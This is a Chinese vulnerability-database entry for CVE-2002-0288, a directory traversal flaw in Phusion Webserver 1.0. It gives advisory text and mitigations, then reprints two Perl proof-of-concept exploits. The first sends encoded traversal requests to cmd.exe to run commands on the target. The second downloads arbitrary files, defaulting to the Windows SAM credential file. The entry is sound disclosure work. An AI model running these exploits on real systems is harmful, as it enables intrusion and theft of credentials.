CVE-2002-0288
CVSS5.0
发布时间 :2002-05-31 00:00:00
修订时间 :2016-10-17 22:18:25
NMCOES    

[原文]Directory traversal vulnerability in Phusion web server 1.0 allows remote attackers to read arbitrary files via a ... (triple dot dot) in the HTTP request.


[CNNVD]Phusion Webserver目录遍历漏洞(CNNVD-200205-147)

        
        Phusion Webserver是一个商业的HTTP服务器,它运行于Microsoft Windows平台。
        Phusion Webserver存在目录遍历漏洞。
        使用连续几个".../"的HTTP请求可以突破wwwroot的限制。一个恶意用户可以浏览目标主机上web用户可读的所有文件,这样会泄漏目标主机上的敏感信息。
        Microsoft Windows平台上的web服务器通常以SYSTEM权限运行。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0288
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0288
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-147
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101408906001958&w=2
(UNKNOWN)  BUGTRAQ  20020217 Phusion-Webserver-v1.0-Bugs&Exploits-Remotes
http://www.securityfocus.com/bid/4117
(UNKNOWN)  BID  4117

- 漏洞信息

Phusion Webserver目录遍历漏洞
中危 输入验证
2002-05-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Phusion Webserver是一个商业的HTTP服务器,它运行于Microsoft Windows平台。
        Phusion Webserver存在目录遍历漏洞。
        使用连续几个".../"的HTTP请求可以突破wwwroot的限制。一个恶意用户可以浏览目标主机上web用户可读的所有文件,这样会泄漏目标主机上的敏感信息。
        Microsoft Windows平台上的web服务器通常以SYSTEM权限运行。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 将Phusion Webserver安装在一个单独的分区,不要在此分区上存放任何敏感资料。
        * 停止使用此Webserver。
        厂商补丁:
        BBShareware.Com
        ---------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.bbshareware.com/phusion/

- 漏洞信息 (21291)

Phusion Webserver 1.0 Directory Traversal Vulnerability (1) (EDBID:21291)
windows remote
2002-02-16 Verified
0 Alex Hernandez
N/A [点击下载]
source: http://www.securityfocus.com/bid/4117/info

Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems.

Phusion Webserver is prone to directory traversal attacks. It is possible to break out of wwwroot using triple-dot-slash (.../) sequences containing HTTP-encoded variations of "/" and "\". As a result, a malicious web user may browse web-readable files on the host running the vulnerable software.

This vulnerability may potentially result in the disclosure of sensitive information contained in web-readable files on the host.

It should be noted that webservers normally run with SYSTEM privileges on Microsoft Windows operating systems. 

#!/usr/bin/perl
#
# Simple script to identify if the host is vulnerable!, 
# 
# This does 15 different checks based IIS 4-5. Have Fun!
#
# Phusion Webserver v1.0 proof-of-concept exploit
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
# G.Maggiotti & H.Oliveira.
# 
#
# Usage: perl -x Phusion_exp.pl <Hosts>:<Port>
#
# Example: 
#
# perl -x Phusion_exp.pl www.whitehouse.com:80
# Trying.....................
#
# <THIS HOST IS VULNERABLE> :-)
# Check the previous notes to execute bugs.
#
#

use Socket;

if ($#ARGV<0) {die "
\nPhusion Webserver v1.0 traversal exploit(c)2002.
Alex Hernandez al3xhernandez\@ureach.com\n

Usage: perl -x $0 www.whitehouse.com:80 {OR}\n
[if the host is not using a proxy]\n
Usage: perl -x $0 127.0.0.1:80\n\n";}

($host,$port)=split(/:/,@ARGV[0]);
print "Trying.....................\n";
$target = inet_aton($host);
$flag=0;

# ---------------test method 1
my @results=sendraw("GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 2
my @results=sendraw("GET
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 3
my @results=sendraw("GET
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 4
my @results=sendraw("GET
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 5
my @results=sendraw("GET
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 6
my @results=sendraw("GET
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}


# ---------------test method 7
my @results=sendraw("GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 8
my @results=sendraw("GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}


# ---------------test method 9
my @results=sendraw("GET
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 10
my @results=sendraw("GET
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 11
my @results=sendraw("GET
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 12
my @results=sendraw("GET
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 13
my @results=sendraw("GET
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 14
my @results=sendraw("GET
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../
winnt/system32/cmd.exe\?/c\+dir
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 15
my @results=sendraw("GET
/.../.../.../.../winnt/system32/cmd.exe\?/c\+dir
HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

#------------------------------
if ($flag==1){print "<THIS HOST IS VULNERABLE> :-)\n
Check the previous notes to execute bugs\n";}
else {print "<THIS HOST IS NOT VULNERABLE> :-( \n
Check manually on browser...\n";}


sub sendraw {   
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect check the port or address...\n"); }
}

		

- 漏洞信息 (21292)

Phusion Webserver 1.0 Directory Traversal Vulnerability (2) (EDBID:21292)
windows remote
2002-02-16 Verified
0 Alex Hernandez
N/A [点击下载]
source: http://www.securityfocus.com/bid/4117/info
 
Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems.
 
Phusion Webserver is prone to directory traversal attacks. It is possible to break out of wwwroot using triple-dot-slash (.../) sequences containing HTTP-encoded variations of "/" and "\". As a result, a malicious web user may browse web-readable files on the host running the vulnerable software.
 
This vulnerability may potentially result in the disclosure of sensitive information contained in web-readable files on the host.
 
It should be noted that webservers normally run with SYSTEM privileges on Microsoft Windows operating systems. 

#!/usr/bin/perl
#
# THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN 
# 
# Simple script to get files on server. 
# 
# Maybe u need this line for windows:
# #! c:\perl\bin\perl.exe
#
# Phusion Webserver v1.0 proof-of-concept exploit.
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
# G.Maggiotti & H.Oliveira.
# 
#
# Usage: perl -x Phusion-GET.pl <And read the Intructions>
#  
#


print("\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");


print <<"EOT";
Please type the address remote webserver, example: www.whitehouse.gov
[Default remote Webserver is "127.0.0.1"`]:
EOT
$host = <>;

print <<"EOT";
Please type only in the directory where the file is located you want to
download, 
example: /winnt/repair/
[default directory is "/winnt/repair/"] :#For IIS 4-5
EOT
$directory = <> || "/winnt/repair/";


print <<"EOT";
Please type in the filename you want download example: sam._ 
[default file is "sam._"] :
EOT
$file = <> || "sam._";

{
#Maybe u to change this line depending of PATH installation.
system("explorer.exe", "http://$host:80/../../..$directory$file");
}

print <<"EOT";

		

- 漏洞信息

8999
Phusion Triple Dot Sequence Parsing Traversal Arbitrary File Access
Remote / Network Access Information Disclosure
Loss of Confidentiality Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2002-02-16 Unknow
2002-02-16 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Phusion Webserver Directory Traversal Vulnerability
Input Validation Error 4117
Yes No
2002-02-16 12:00:00 2009-07-11 10:56:00
This issue was announced on February 16th, 2002 by Alex Hernandez <al3xhernandez@ureach.com>.

- 受影响的程序版本

BBShareware.Com Phusion Webserver 1.0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0

- 漏洞讨论

Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems.

Phusion Webserver is prone to directory traversal attacks. It is possible to break out of wwwroot using triple-dot-slash (.../) sequences containing HTTP-encoded variations of "/" and "\". As a result, a malicious web user may browse web-readable files on the host running the vulnerable software.

This vulnerability may potentially result in the disclosure of sensitive information contained in web-readable files on the host.

It should be noted that webservers normally run with SYSTEM privileges on Microsoft Windows operating systems.

- 漏洞利用

The following proof-of-concepts were provided by Alex Hernandez &lt;al3xhernandez@ureach.com&gt;:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站